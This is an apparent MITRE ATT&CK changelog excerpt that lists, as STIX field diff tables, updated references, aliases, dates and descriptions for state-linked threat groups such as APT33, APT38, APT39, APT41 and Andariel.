| external_references[18]['source_name'] | UK NSCS Russia SolarWinds April 2021 | FireEye APT29 Nov 2018 |
| external_references[18]['description'] | UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021. | Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. |
| external_references[18]['url'] | https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise | https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html |
| external_references[19]['source_name'] | FireEye SUNBURST Backdoor December 2020 | F-Secure The Dukes |
| external_references[19]['description'] | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. | F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. |
| external_references[19]['url'] | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html | https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf |
| external_references[20]['source_name'] | MSTIC NOBELIUM Mar 2021 | ESET Dukes October 2019 |
| external_references[20]['description'] | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. | Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. |
| external_references[20]['url'] | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ | https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf |
| external_references[21]['source_name'] | CrowdStrike SUNSPOT Implant January 2021 | FireEye SUNBURST Backdoor December 2020 |
| external_references[21]['description'] | CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021. | FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. |
| external_references[21]['url'] | https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ | https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html |
| external_references[22]['source_name'] | Volexity SolarWinds | SentinelOne NobleBaron June 2021 |
| external_references[22]['description'] | Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. | Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021. |
| external_references[22]['url'] | https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ | https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/ |
| external_references[23]['source_name'] | Cybersecurity Advisory SVR TTP May 2021 | Microsoft Unidentified Dec 2018 |
| external_references[23]['description'] | NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. | Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. |
| external_references[23]['url'] | https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf | https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ |
| external_references[24]['source_name'] | FireEye APT29 Nov 2018 | MSTIC NOBELIUM May 2021 |
| external_references[24]['description'] | Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. |
| external_references[24]['url'] | https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ |
| external_references[25]['source_name'] | ESET Dukes October 2019 | MSRC Nobelium June 2021 |
| external_references[25]['description'] | Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. | MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021. |
| external_references[25]['url'] | https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf | https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/ |
| external_references[26]['source_name'] | NCSC APT29 July 2020 | MSTIC Nobelium Toolset May 2021 |
| external_references[26]['description'] | National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. | MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. |
| external_references[26]['url'] | https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf | https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ |
| external_references[27]['source_name'] | SentinelOne NobleBaron June 2021 | MSTIC NOBELIUM Mar 2021 |
| external_references[27]['description'] | Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021. | Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021. |
| external_references[27]['url'] | https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/ | https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
| external_references[28]['source_name'] | MSTIC NOBELIUM May 2021 | NCSC APT29 July 2020 |
| external_references[28]['description'] | Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021. | National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020. |
| external_references[28]['url'] | https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ | https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf |
| external_references[29]['source_name'] | MSTIC Nobelium Toolset May 2021 | Cybersecurity Advisory SVR TTP May 2021 |
| external_references[29]['description'] | MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021. | NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021. |
| external_references[29]['url'] | https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ | https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf |
| external_references[30]['source_name'] | MSRC Nobelium June 2021 | NSA Joint Advisory SVR SolarWinds April 2021 |
| external_references[30]['description'] | MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021. | NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021. |
| external_references[30]['url'] | https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/ | https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF |
| external_references[31]['source_name'] | Microsoft Unidentified Dec 2018 | Secureworks IRON HEMLOCK Profile |
| external_references[31]['description'] | Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019. | Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022. |
| external_references[31]['url'] | https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ | http://www.secureworks.com/research/threat-profiles/iron-hemlock |
| x_mitre_version | 2.1 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON RITUAL | |
| aliases | IRON HEMLOCK | |
| external_references | {'source_name': 'Secureworks IRON RITUAL Profile', 'description': 'Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-ritual'} | |
| external_references | {'source_name': 'UK Gov Malign RIS Activity April 2021', 'description': 'UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services'} | |
| external_references | {'source_name': 'UK Gov UK Exposes Russia SolarWinds April 2021', 'description': 'UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.', 'url': 'https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise'} | |
| external_references | {'source_name': 'UK NSCS Russia SolarWinds April 2021', 'description': 'UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.', 'url': 'https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise'} | |
| external_references | {'source_name': 'White House Imposing Costs RU Gov April 2021', 'description': 'White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.', 'url': 'https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/'} | |
| Description |
|---|
| [APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 12:40:42.907000+00:00 | 2022-05-23 21:22:08.170000+00:00 |
| external_references[4]['source_name'] | FireEye APT33 Sept 2017 | FireEye APT33 Webinar Sept 2017 |
| external_references[4]['description'] | O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018. | Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html | https://www.brighttalk.com/webcast/10703/275683 |
| external_references[5]['source_name'] | FireEye APT33 Webinar Sept 2017 | Microsoft Holmium June 2020 |
| external_references[5]['description'] | Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018. | Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020. |
| external_references[5]['url'] | https://www.brighttalk.com/webcast/10703/275683 | https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/ |
| external_references[6]['source_name'] | Microsoft Holmium June 2020 | FireEye APT33 Sept 2017 |
| external_references[6]['description'] | Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020. | O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018. |
| external_references[6]['url'] | https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/ | https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html |
| Description |
|---|
| [APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 16:33:27.982000+00:00 | 2022-01-18 17:13:14.610000+00:00 |
| Old Description | New Description |
|---|---|
| [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 23:08:30.844000+00:00 | 2022-09-02 18:03:29.024000+00:00 |
| description | [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | [APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| external_references[1]['source_name'] | APT39 | Remix Kitten |
| external_references[1]['description'] | (Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | (Citation: Crowdstrike GTR2020 Mar 2020) |
| external_references[2]['source_name'] | REMIX KITTEN | ITG07 |
| external_references[2]['description'] | (Citation: Crowdstrike GTR2020 Mar 2020) | (Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| external_references[3]['source_name'] | ITG07 | APT39 |
| external_references[3]['description'] | (Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) | (Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020) |
| external_references[5]['source_name'] | FireEye APT39 Jan 2019 | Crowdstrike GTR2020 Mar 2020 |
| external_references[5]['description'] | Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019. | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf |
| external_references[6]['source_name'] | Symantec Chafer Dec 2015 | Dept. of Treasury Iran Sanctions September 2020 |
| external_references[6]['description'] | Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019. | Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020. |
| external_references[6]['url'] | https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets | https://home.treasury.gov/news/press-releases/sm1127 |
| external_references[7]['source_name'] | FBI FLASH APT39 September 2020 | DOJ Iran Indictments September 2020 |
| external_references[7]['description'] | FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. | DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020. |
| external_references[7]['url'] | https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf | https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt |
| external_references[8]['source_name'] | Dept. of Treasury Iran Sanctions September 2020 | FBI FLASH APT39 September 2020 |
| external_references[8]['description'] | Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020. | FBI. (2020, September 17). Indicators of Compromise Associated with Rana Intelligence Computing, also known as Advanced Persistent Threat 39, Chafer, Cadelspy, Remexi, and ITG07. Retrieved December 10, 2020. |
| external_references[8]['url'] | https://home.treasury.gov/news/press-releases/sm1127 | https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf |
| external_references[9]['source_name'] | DOJ Iran Indictments September 2020 | FireEye APT39 Jan 2019 |
| external_references[9]['description'] | DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020. | Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019. |
| external_references[9]['url'] | https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt | https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html |
| external_references[10]['source_name'] | Crowdstrike GTR2020 Mar 2020 | Dark Reading APT39 JAN 2019 |
| external_references[10]['description'] | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. | Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020. |
| external_references[10]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf | https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764 |
| external_references[11]['source_name'] | Dark Reading APT39 JAN 2019 | Symantec Chafer Dec 2015 |
| external_references[11]['description'] | Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020. | Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019. |
| external_references[11]['url'] | https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764 | https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Remix Kitten |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | REMIX KITTEN |
| Description |
|---|
| [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 00:28:08.413000+00:00 | 2022-06-02 20:09:29.475000+00:00 |
| aliases[1] | WICKED PANDA | Wicked Panda |
| external_references[1]['source_name'] | APT41 | Wicked Panda |
| external_references[1]['description'] | (Citation: FireEye APT41 2019) | (Citation: Crowdstrike GTR2020 Mar 2020) |
| external_references[2]['source_name'] | WICKED PANDA | APT41 |
| external_references[2]['description'] | (Citation: Crowdstrike GTR2020 Mar 2020) | (Citation: FireEye APT41 2019) |
| external_references[3]['source_name'] | FireEye APT41 Aug 2019 | Crowdstrike GTR2020 Mar 2020 |
| external_references[3]['description'] | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. |
| external_references[3]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf |
| external_references[4]['source_name'] | Group IB APT 41 June 2021 | FireEye APT41 2019 |
| external_references[4]['description'] | Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021. | FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019. |
| external_references[4]['url'] | https://blog.group-ib.com/colunmtk_apt41 | https://content.fireeye.com/apt-41/rpt-apt41 |
| external_references[5]['source_name'] | Crowdstrike GTR2020 Mar 2020 | FireEye APT41 Aug 2019 |
| external_references[5]['description'] | Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020. | Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019. |
| external_references[5]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf | https://content.fireeye.com/apt-41/rpt-apt41 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://blog.group-ib.com/colunmtk_apt41'} |
| Description |
|---|
| [Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 20:13:14.377000+00:00 | 2021-12-17 19:27:27.246000+00:00 |
| external_references[1]['description'] | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between Ajax Security Team and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015) | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and the campaign Operation Woolen-Goldfish.(Citation: Check Point Rocket Kitten)(Citation: TrendMicro Operation Woolen Goldfish March 2015) |
| external_references[3]['description'] | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between Ajax Security Team and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017) | Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://attack.mitre.org/groups/G0130) and Rocket Kitten.(Citation: Check Point Rocket Kitten)(Citation: IranThreats Kittens Dec 2017) |
| Description |
|---|
| [Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021) [Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea's Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 15:16:47.329000+00:00 | 2022-05-24 16:27:11.471000+00:00 |
| external_references[1]['source_name'] | Andariel | Silent Chollima |
| external_references[1]['description'] | (Citation: FSI Andariel Campaign Rifle July 2017) | (Citation: CrowdStrike Silent Chollima Adversary September 2021) |
| external_references[2]['source_name'] | Silent Chollima | Andariel |
| external_references[2]['description'] | (Citation: CrowdStrike Silent Chollima Adversary September 2021) | (Citation: FSI Andariel Campaign Rifle July 2017) |
| external_references[3]['source_name'] | FSI Andariel Campaign Rifle July 2017 | AhnLab Andariel Subgroup of Lazarus June 2018 |
| external_references[3]['description'] | FSI. (2017, July 27). Campaign Rifle - Andariel, the Maiden of Anguish. Retrieved September 29, 2021. | AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021. |
| external_references[3]['url'] | https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do | http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf |
| external_references[4]['source_name'] | IssueMakersLab Andariel GoldenAxe May 2017 | TrendMicro New Andariel Tactics July 2018 |
| external_references[4]['description'] | IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021. | Chen, Joseph. (2018, July 16). New Andariel Reconnaissance Tactics Uncovered. Retrieved September 29, 2021. |
| external_references[4]['url'] | http://www.issuemakerslab.com/research3/ | https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html |
| external_references[5]['source_name'] | AhnLab Andariel Subgroup of Lazarus June 2018 | CrowdStrike Silent Chollima Adversary September 2021 |
